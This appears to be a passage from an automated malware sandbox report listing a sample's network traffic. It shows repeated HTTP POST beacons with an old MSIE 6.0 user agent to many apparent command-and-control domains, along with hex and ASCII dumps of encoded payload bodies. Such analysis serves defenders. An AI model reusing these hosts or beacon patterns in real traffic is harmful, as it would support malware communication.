39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4e 57 66 70 79 37 47 50 59 68 72 30 41 4a 53 62 6b 75 33 43 4c 55 64 6f 78 36 46 4f 58 67 71 7a 39 49 52 61 6a 74 33 43 4c 55 64 6f 78 36 46 4f 58 67 71 7a 38 48 51 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 70 79 37 47 50 5a 69 73 31 41 4b 54 63 6c 76 34 44 4d 55 67 73 31 41 4d 56 65 6f 30 47 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 64 6f 78 36 47 50 59 68 72 30 39 49 53 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 79 37 47 50 59 68 72 31 41 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 50 59 68 72 31 41 4a 53 62 6b 74 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 75 33 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 49 53 61 6a 74 32 42 4b 55 63 6c 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 46 4f 58 67 71 79 37 48 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 52 6f 78 37 47 51 59 68 72 30 41 4a 53 62 6b 75 33 43 4c 54 63 6d 77 35 45 4e 57 65 6f 78 36 46 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 Data Ascii: oy7GPYhr09IRbku3CLUdmw5ENXgqz8HQZis1AJSbku3CQcmw5ENWfpy7GPYis1AJSbku4DMVeox6FOXhr09IScmw5ENWfpy8HQZis1AJSbkv4DMVeox6FOXgr09IRajt2CLUdmw5ENWfpy7GPZis1AJSbku3EOXhr09IRajt2BKTclv4DNWfpy7GPYhr0AJSbku3CLUdox6FOXgqz9IRajt3CLUdox6FOXgqz8HQajt2BKTclv4DMVepy7GPZis1AKTclv4DMUgs1AMVeo0Ggqz8HQZis1AJSbku3CLUdmw5ENXgqz8HQZis1AJSdox6GPYhr09ISclv4DMVeox6FOajt2BKTclv4DMVeoy7GPYhr1AKTclv4DMVeox6FPYhr1AJSbkt3CLUdmw5ENWfpy7GPYhr09IRajt2BKTclu3DMVeox6FOXgqz8ISajt2BKUclw5ENWfpy7GPYhr09IRajt2BKTclv4DMVeox6FOXgqz8HQZis1AJSbku3CLUdmw5FOXgqy7HPYhr09IRajt2BKTclv4DMVRox7GQYhr0AJSbku3CLTcmw5ENWeox6FPYhr09IRajt2BKTclv4DMVeox6FOXg
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 415User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: shesfit.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 6b 31 44 4e 59 6b 77 37 48 54 66 72 31 44 4f 59 6a 76 35 47 51 62 70 30 41 4c 57 67 73 32 44 4f 59 6a 75 35 46 51 62 6c 78 41 4b 56 67 72 32 43 4e 58 69 74 34 46 50 61 6c 77 37 50 61 6c 77 37 48 53 63 6f 7a 41 4b 56 66 72 31 43 4d 58 69 74 34 45 52 63 6f 7a 39 4b 55 66 71 31 42 4d 57 68 73 33 45 50 5a 6b 76 36 47 52 62 6d 78 38 49 54 64 70 7a 41 4b 56 67 72 32 43 4e 58 69 74 34 45 50 61 6b 77 36 48 52 63 6d 79 38 4a 54 65 70 30 41 4c 57 67 73 32 44 4e 59 69 75 35 46 51 62 6c 78 37 49 53 64 6f 7a 39 4b 55 67 65 4f 5a 68 72 30 39 49 51 5a 69 73 31 39 49 52 61 69 73 31 41 4a 53 62 6a 74 32 42 4a 53 62 6a 74 32 42 4a 54 62 6b 75 32 42 4b 54 62 6b 75 33 42 4b 54 63 6c 75 33 43 4b 54 63 6c 75 33 44 4d 55 64 6d 76 34 44 4d 55 64 6d 77 35 45 4d 56 65 6d 77 35 45 4d 56 65 6f 78 35 45 4e 56 65 6f 78 35 45 4e 57 65 6f 78 36 45 4e 57 66 70 78 36 46 4e 57 66 70 78 36 46 4e 58 66 70 79 37 46 4f 58 66 74 32 43 4c 55 63 6c 76 33 43 4c 55 63 6c 76 34 43 4d 55 64 6d 77 34 44 4d 56 64 6d 77 35 44 4d 56 64 6d 77 35 44 4d 56 64 6d 77 35 44 4d 56 64 6d 77 35 45 4e 56 65 6f 78 37 46 4f 58 67 70 79 37 46 4f 58 67 70 79 37 47 4f 58 67 70 79 39 48 51 5a 68 72 30 39 4b 56 65 6f 77 35 45 50 59 67 71 7a 38 49 51 5a 69 73 30 39 49 52 5a 69 75 32 45 4e 56 Data Ascii: k1DNYkw7HTfr1DOYjv5GQbp0ALWgs2DOYju5FQblxAKVgr2CNXit4FPalw7Palw7HScozAKVfr1CMXit4ERcoz9KUfq1BMWhs3EPZkv6GRbmx8ITdpzAKVgr2CNXit4EPakw6HRcmy8JTep0ALWgs2DNYiu5FQblx7ISdoz9KUgeOZhr09IQZis19IRais1AJSbjt2BJSbjt2BJTbku2BKTbku3BKTclu3CKTclu3DMUdmv4DMUdmw5EMVemw5EMVeox5ENVeox5ENWeox6ENWfpx6FNWfpx6FNXfpy7FOXft2CLUclv3CLUclv4CMUdmw4DMVdmw5DMVdmw5DMVdmw5DMVdmw5ENVeox7FOXgpy7FOXgpy7GOXgpy9HQZhr09KVeow5EPYgqz8IQZis09IRZiu2ENV
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1316User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: kumaden.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 66 59 62 53 43 6e 62 75 71 79 57 47 4c 32 65 6f 30 52 4f 7a 38 42 6e 2f 55 72 4f 57 4e 64 55 66 43 6e 70 4e 41 61 4c 2f 2b 6e 2b 43 37 39 4f 73 58 4a 45 59 48 53 6c 32 2b 32 55 70 72 55 58 2f 39 57 33 31 65 51 78 39 41 6b 66 47 77 43 76 79 55 79 68 56 46 62 64 65 45 65 7a 73 34 68 78 77 73 68 73 52 6b 35 35 72 58 53 75 64 67 33 2b 44 6e 6a 51 4c 54 69 69 6e 4b 6d 52 7a 45 57 55 6a 74 46 55 4b 52 41 46 6a 54 53 44 61 46 70 72 5a 58 6e 71 37 2f 61 54 34 56 61 78 66 7a 44 64 70 58 57 62 6d 48 2b 61 52 4e 71 48 48 79 55 72 4a 35 64 43 74 35 6b 47 30 70 57 4b 31 30 73 67 6c 72 51 56 72 65 4c 54 36 38 4c 42 50 54 52 2f 66 6b 63 6a 6c 6d 48 37 30 61 54 4f 77 34 5a 52 35 33 34 53 36 31 42 47 32 39 44 65 32 66 6e 79 75 55 30 68 34 59 38 6e 6c 54 31 75 75 65 64 4a 6b 79 56 67 62 4f 6f 43 2f 69 43 6e 2b 4e 37 44 48 47 2b 39 61 64 2f 63 2b 51 65 6c 57 32 68 67 7a 31 55 6e 41 6f 62 51 76 33 55 51 2b 53 46 4c 32 31 78 61 34 52 75 2b 6f 2b 41 52 38 33 38 4a 64 70 63 50 78 66 64 52 59 4c 30 7a 6a 52 2b 45 39 65 44 59 6f 33 4a 70 61 74 67 7a 4a 75 2f 4f 55 32 54 72 36 77 53 7a 76 45 6d 38 42 72 6b 41 67 74 6c 54 78 6c 74 6b 55 72 33 79 67 44 59 45 58 64 4b 36 36 55 59 35 4a 52 6c 37 79 38 75 35 4e 42 2b 4a 39 38 61 38 75 71 4a 6b 73 75 43 4a 61 4c 48 4c 78 76 6d 6e 79 42 35 4a 74 69 30 44 45 39 56 32 45 66 36 32 6c 44 71 52 4a 53 33 34 41 67 39 77 2f 54 49 51 5a 64 4d 69 64 56 77 50 78 4b 51 34 59 46 4e 4e 43 32 34 67 34 6a 7a 6b 44 74 37 58 38 57 47 49 4d 37 70 43 6a 4b 6e 61 78 68 5a 6b 43 46 62 41 44 4d 54 54 4b 4e 4a 44 48 78 5a 65 59 63 52 75 43 58 4b 66 4d Data Ascii: fYbSCnbuqyWGL2eo0ROz8Bn/UrOWNdUfCnpNAaL/+n+C79OsXJEYHSl2+2UprUX/9W31eQx9AkfGwCvyUyhVFbdeEezs4hxwshsRk55rXSudg3+DnjQLTiinKmRzEWUjtFUKRAFjTSDaFprZXnq7/aT4VaxfzDdpXWbmH+aRNqHHyUrJ5dCt5kG0pWK10sglrQVreLT68LBPTR/fkcjlmH70aTOw4ZR534S61BG29De2fnyuU0h4Y8nlT1uuedJkyVgbOoC/iCn+N7DHG+9ad/c+QelW2hgz1UnAobQv3UQ+SFL21xa4Ru+o+AR838JdpcPxfdRYL0zjR+E9eDYo3JpatgzJu/OU2Tr6wSzvEm8BrkAgtlTxltkUr3ygDYEXdK66UY5JRl7y8u5NB+J98a8uqJksuCJaLHLxvmnyB5Jti0DE9V2Ef62lDqRJS34Ag9w/TIQZdMidVwPxKQ4YFNNC24g4jzkDt7X8WGIM7pCjKnaxhZkCFbADMTTKNJDHxZeYcRuCXKfM
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 545User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: from30ty.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 73 34 45 4f 58 66 70 79 37 47 4f 58 67 71 7a 37 47 52 61 6a 74 32 42 4a 53 62 6b 75 33 43 4c 55 63 6c 76 34 43 4c 55 64 6d 77 36 46 4f 58 67 71 79 37 47 50 59 67 71 7a 38 48 52 63 6c 75 34 44 4d 57 65 6f 78 36 45 4e 59 68 72 30 39 4a 53 62 6a 74 32 42 4a 55 64 70 79 37 47 50 58 67 71 30 39 48 52 62 6a 74 32 43 4b 54 63 6c 75 35 45 4d 56 65 6f 77 35 45 4f 59 69 73 31 41 4a 52 63 6c 76 36 46 4f 58 66 72 31 41 4a 53 62 6b 75 34 44 4e 57 67 71 7a 38 48 51 5a 69 73 31 42 4a 53 62 6b 76 36 47 50 59 67 71 7a 38 48 50 59 68 72 30 41 4a 53 62 6c 76 34 44 4d 56 65 6d 77 35 45 4e 56 66 71 7a 38 47 50 59 68 72 30 39 49 55 67 71 7a 38 48 50 59 68 72 7a 39 49 52 61 69 73 31 41 49 52 61 6a 74 31 44 4e 57 69 74 32 42 4b 53 62 6b 75 32 43 4c 55 63 6c 77 36 47 50 59 67 73 32 42 4b 59 68 72 30 39 4b 53 63 6c 76 34 44 4d 56 65 70 31 41 4a 53 61 6a 74 33 43 4c 55 64 6c 77 38 49 54 63 6c 76 34 43 4c 56 65 6d 77 35 45 53 62 6c 76 34 45 4e 57 66 6f 78 37 47 50 5a 69 74 34 44 4d 56 65 6d 77 35 45 4e 56 65 6f 78 36 46 4f 58 67 70 79 37 47 50 58 67 72 35 46 4f 57 66 70 7a 39 49 52 64 6f 7a 38 48 51 5a 69 73 31 41 4b 54 63 6c 76 33 43 4c 55 64 6c 76 34 44 4c 55 64 6d 77 35 45 4e 56 6a 74 32 41 4a 53 62 6b 75 35 44 54 63 6c 76 33 43 4c 55 67 71 31 41 4a 53 61 6b 75 34 44 4d 56 65 6f 78 36 46 4f 5a 6b 77 35 44 4d 56 65 6d 78 36 46 4f 57 66 70 79 37 46 4f 59 69 74 33 43 4c 54 65 6d 77 37 47 52 64 6d 77 35 45 4e 57 66 70 79 42 4b 54 63 6c 76 33 43 4d 56 64 6d 77 34 44 4f 58 68 72 30 41 4a 55 63 6d 77 34 44 4d 56 65 6f 78 36 46 4e 57 66 70 79 37 48 51 5a 6a 73 31 41 4b 54 63 6c 78 37 47 4f 58 67 71 7a 38 48 51 5a 69 75 34 45 4e 57 66 70 79 Data Ascii: s4EOXfpy7GOXgqz7GRajt2BJSbku3CLUclv4CLUdmw6FOXgqy7GPYgqz8HRclu4DMWeox6ENYhr09JSbjt2BJUdpy7GPXgq09HRbjt2CKTclu5EMVeow5EOYis1AJRclv6FOXfr1AJSbku4DNWgqz8HQZis1BJSbkv6GPYgqz8HPYhr0AJSblv4DMVemw5ENVfqz8GPYhr09IUgqz8HPYhrz9IRais1AIRajt1DNWit2BKSbku2CLUclw6GPYgs2BKYhr09KSclv4DMVep1AJSajt3CLUdlw8ITclv4CLVemw5ESblv4ENWfox7GPZit4DMVemw5ENVeox6FOXgpy7GPXgr5FOWfpz9IRdoz8HQZis1AKTclv3CLUdlv4DLUdmw5ENVjt2AJSbku5DTclv3CLUgq1AJSaku4DMVeox6FOZkw5DMVemx6FOWfpy7FOYit3CLTemw7GRdmw5ENWfpyBKTclv3CMVdmw4DOXhr0AJUcmw4DMVeox6FNWfpy7HQZjs1AKTclx7GOXgqz8HQZiu4ENWfpy
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1889User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: doggybag.orgConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1066User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: kevyt.netConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: strazynski.plCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 612User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: bggs.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 6d 79 37 46 51 61 6a 74 32 42 4b 54 63 6c 76 34 44 50 58 67 72 32 43 4c 55 64 6d 77 34 44 4d 56 65 6f 78 37 47 50 5a 68 72 32 43 4b 54 63 6c 76 34 44 4d 56 64 6d 78 36 45 4e 58 66 70 79 37 47 50 5a 69 73 31 39 49 55 64 59 75 33 43 4c 55 64 6d 77 35 45 4d 56 65 6f 79 37 47 4f 58 67 71 30 42 4b 54 63 6c 76 34 48 51 5a 69 73 31 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 37 47 50 59 68 72 30 39 48 51 5a 69 73 31 41 4a 53 63 6b 75 33 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 6a 74 32 42 4b 54 63 6f 77 35 45 4e 57 66 72 31 41 4a 53 62 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 73 33 43 4c 54 63 6c 77 36 46 4f 58 66 70 7a 38 47 50 59 68 72 31 42 4b 54 63 6c 76 34 44 4e 58 67 71 79 37 47 50 59 68 72 30 39 49 52 63 6c 76 35 45 4e 56 65 70 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 42 4b 58 68 72 30 39 49 52 63 6d 77 35 45 4e 57 65 6f 78 36 46 4f 58 69 74 32 43 4c 55 64 6d 77 37 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 42 4b 58 67 70 7a 38 49 53 62 6b 74 32 42 4b 54 63 6c 76 34 44 50 5a 6c 76 34 44 4d 55 66 70 79 37 47 50 59 68 72 7a 38 48 51 5a 69 73 36 48 52 61 6a 74 32 42 4b 58 6f 78 36 47 50 58 68 72 7a 38 48 51 5a 69 74 32 45 4f 58 68 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 45 4e 57 66 70 79 37 47 53 62 78 37 47 50 59 68 72 30 39 49 73 32 42 4b 54 63 6c 76 34 44 4d 56 64 6f 78 36 46 4f 5a 69 73 38 48 51 5a 6a 76 34 4b 61 73 41 53 6b 34 4e 68 30 48 58 72 41 58 6f 4e 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 41 4b 67 30 44 53 67 77 39 4e 61 6f 31 46 53 66 76 41 4e 61 6f 32 48 5a 70 36 51 6c 32 4d 66 79 45 59 72 42 54 6d 35 50 69 31 4a 59 71 39 52 69 31 4b 63 77 44 58 72 38 50 69 32 4c 63 75 44 56 70 38 51 67 79 48 5a 74 42 54 6c 35 4e 66 79 47 61 76 42 4f 69 35 4b 61 71 39 52 6a 34 4b 59 72 46 55 6f 41 57 75 47 63 71 Data Ascii: my7FQajt2BKTclv4DPXgr2CLUdmw4DMVeox7GPZhr2CKTclv4DMVdmx6ENXfpy7GPZis19IUdYu3CLUdmw5EMVeoy7GOXgq0BKTclv4HQZis19IRajt2BKTclv4DMVeox7GPYhr09HQZis1AJScku3DMVeox6FOXgqz8HQZjt2BKTcow5ENWfr1AJSbjt2BKTclv4DMVes3CLTclw6FOXfpz8GPYhr1BKTclv4DNXgqy7GPYhr09IRclv5ENVepz8HQZis1AJSbku3BKXhr09IRcmw5ENWeox6FOXit2CLUdmw7FOXgqz8HQZis1BKXgpz8ISbkt2BKTclv4DPZlv4DMUfpy7GPYhrz8HQZis6HRajt2BKXox6GPXhrz8HQZit2EOXhqz8HQZis1AJSbku3CKTclv4DMVeox6ENWfpy7GSbx7GPYhr09Is2BKTclv4DMVdox6FOZis8HQZjv4KasASk4Nh0HXrAXoN4DMVeox6FOXgqz8HQZis1AKg0DSgw9Nao1FSfvANao2HZp6Ql2MfyEYrBTm5Pi1JYq9Ri1KcwDXr8Pi2LcuDVp8QgyHZtBTl5NfyGavBOi5Kaq9Rj4KYrFUoAWuGcq
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 441User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: bount.com.twConnection: Keep-AliveCache-Control: no-cacheData Raw: 77 35 44 4c 54 62 69 72 7a 36 45 4d 54 62 6a 73 7a 37 46 4d 55 63 6b 73 30 38 46 4e 56 64 6b 74 31 39 47 4f 57 64 6c 75 32 41 48 50 58 65 6d 76 32 41 49 51 58 66 6f 76 33 42 49 51 59 66 6f 77 34 43 4a 52 5a 68 70 78 35 44 4b 53 61 69 71 79 36 45 4c 54 62 69 72 7a 37 45 4d 55 62 6a 73 30 37 46 4e 55 63 6b 73 30 38 47 4e 56 64 6c 75 31 39 48 4f 57 65 6d 75 32 41 49 50 58 66 6f 76 33 42 4a 52 5a 67 70 78 34 43 4b 53 5a 68 71 79 35 44 4c 53 61 69 72 79 36 45 4d 54 62 6a 72 7a 37 46 4e 55 63 6b 73 30 38 47 4f 56 64 6c 74 31 39 48 4f 57 65 6c 75 32 41 48 50 58 66 6d 76 33 41 49 51 59 67 6f 77 34 43 4a 52 5a 68 70 78 35 44 4b 53 61 69 71 79 36 45 4c 54 62 6a 72 7a 37 45 4d 55 62 6a 73 30 37 46 4e 56 64 6b 74 31 39 47 4f 57 65 6c 75 32 39 48 50 58 65 6d 76 33 41 49 51 59 66 6f 77 34 42 4a 52 5a 67 70 78 34 43 4b 52 5a 68 71 78 35 44 4c 54 61 69 72 7a 36 45 4d 54 62 6a 73 7a 37 46 4e 55 63 6b 74 31 38 47 4f 56 64 6c 74 31 39 48 4f 57 65 6d 75 32 41 49 50 58 66 6f 77 33 42 4a 52 59 67 70 78 34 43 4b 53 5a 68 71 78 35 44 4c 53 61 69 72 79 36 45 4c 54 62 6a 72 7a 37 46 4d 55 63 6a 73 30 38 47 4f 57 64 6c 75 32 39 48 50 57 65 6d 76 32 41 49 50 58 66 6f 77 33 42 4a 52 59 67 70 77 34 43 4b 52 5a 68 71 78 35 44 4c 53 61 69 72 79 36 45 4d 54 62 6a 73 7a 37 46 4d 55 63 6b 73 30 38 47 4e 56 64 6b 74 31 38 47 4f 57 65 6c Data Ascii: w5DLTbirz6EMTbjsz7FMUcks08FNVdkt19GOWdlu2AHPXemv2AIQXfov3BIQYfow4CJRZhpx5DKSaiqy6ELTbirz7EMUbjs07FNUcks08GNVdlu19HOWemu2AIPXfov3BJRZgpx4CKSZhqy5DLSairy6EMTbjrz7FNUcks08GOVdlt19HOWelu2AHPXfmv3AIQYgow4CJRZhpx5DKSaiqy6ELTbjrz7EMUbjs07FNVdkt19GOWelu29HPXemv3AIQYfow4BJRZgpx4CKRZhqx5DLTairz6EMTbjsz7FNUckt18GOVdlt19HOWemu2AIPXfow3BJRYgpx4CKSZhqx5DLSairy6ELTbjrz7FMUcjs08GOWdlu29HPWemv2AIPXfow3BJRYgpw4CKRZhqx5DLSairy6EMTbjsz7FMUcks08GNVdkt18GOWel
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: nts-web.netCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: clinicasanluis.com.coCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1489User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: kevyt.netConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: mackusick.deCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1792User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: sjbmw.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: *Accept-Language: en-usContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 4776User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: impexnc.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 607User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: orbitgas.comConnection: Keep-AliveCache-Control: no-cacheData Raw: 6f 79 37 47 50 59 68 72 30 39 49 52 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 51 63 6d 77 35 45 4e 57 66 70 79 37 47 50 59 69 73 31 41 4a 53 62 6b 75 34 44 4d 56 65 6f 78 36 46 4f 58 68 72 30 39 49 53 63 6d 77 35 45 4e 57 66 70 79 38 48 51 5a 69 73 31 41 4a 53 62 6b 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 72 30 39 49 52 61 6a 74 32 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 5a 69 73 31 41 4a 53 62 6b 75 33 45 4f 58 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4e 57 66 70 79 37 47 50 59 68 72 30 41 4a 53 62 6b 75 33 43 4c 55 64 6f 78 36 46 4f 58 67 71 7a 39 49 52 61 6a 74 33 43 4c 55 64 6f 78 36 46 4f 58 67 71 7a 38 48 51 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 70 79 37 47 50 5a 69 73 31 41 4b 54 63 6c 76 34 44 4d 55 67 73 31 41 4d 56 65 6f 30 47 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 45 4e 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 64 6f 78 36 47 50 59 68 72 30 39 49 53 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 79 37 47 50 59 68 72 31 41 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 50 59 68 72 31 41 4a 53 62 6b 74 33 43 4c 55 64 6d 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 75 33 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 49 53 61 6a 74 32 42 4b 55 63 6c 77 35 45 4e 57 66 70 79 37 47 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 71 7a 38 48 51 5a 69 73 31 41 4a 53 62 6b 75 33 43 4c 55 64 6d 77 35 46 4f 58 67 71 79 37 48 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 52 6f 78 37 47 51 59 68 72 30 41 4a 53 62 6b 75 33 43 4c 54 63 6d 77 35 45 4e 57 65 6f 78 36 46 50 59 68 72 30 39 49 52 61 6a 74 32 42 4b 54 63 6c 76 34 44 4d 56 65 6f 78 36 46 4f 58 67 Data Ascii: oy7GPYhr09IRbku3CLUdmw5ENXgqz8HQZis1AJSbku3CQcmw5ENWfpy7GPYis1AJSbku4DMVeox6FOXhr09IScmw5ENWfpy8HQZis1AJSbkv4DMVeox6FOXgr09IRajt2CLUdmw5ENWfpy7GPZis1AJSbku3EOXhr09IRajt2BKTclv4DNWfpy7GPYhr0AJSbku3CLUdox6FOXgqz9IRajt3CLUdox6FOXgqz8HQajt2BKTclv4DMVepy7GPZis1AKTclv4DMUgs1AMVeo0Ggqz8HQZis1AJSbku3CLUdmw5ENXgqz8HQZis1AJSdox6GPYhr09ISclv4DMVeox6FOajt2BKTclv4DMVeoy7GPYhr1AKTclv4DMVeox6FPYhr1AJSbkt3CLUdmw5ENWfpy7GPYhr09IRajt2BKTclu3DMVeox6FOXgqz8ISajt2BKUclw5ENWfpy7GPYhr09IRajt2BKTclv4DMVeox6FOXgqz8HQZis1AJSbku3CLUdmw5FOXgqy7HPYhr09IRajt2BKTclv4DMVRox7GQYhr0AJSbku3CLTcmw5ENWeox6FPYhr09IRajt2BKTclv4DMVeox6FOXg
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 906User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: agulatex.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 78User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: hes.ptConnection: Keep-AliveCache-Control: no-cacheData Raw: 58 69 74 32 42 4c 55 65 6f 78 37 47 51 5a 6a 74 32 43 4c 55 64 6f 78 37 47 50 59 69 73 31 42 4b 54 63 6d 78 36 46 50 59 68 73 31 41 4b 54 63 6d 77 36 46 4f 59 68 72 31 41 4a 53 63 6d 77 35 45 4f 5a 69 73 32 42 4b 55 64 6d 78 36 47 50 Data Ascii: Xit2BLUeox7GQZjt2CLUdox7GPYis1BKTcmx6FPYhs1AKTcmw6FOYhr1AJScmw5EOZis2BKUdmx6GP
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 961User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: pers.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 1185User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: yoruksut.comConnection: Keep-AliveCache-Control: no-cache
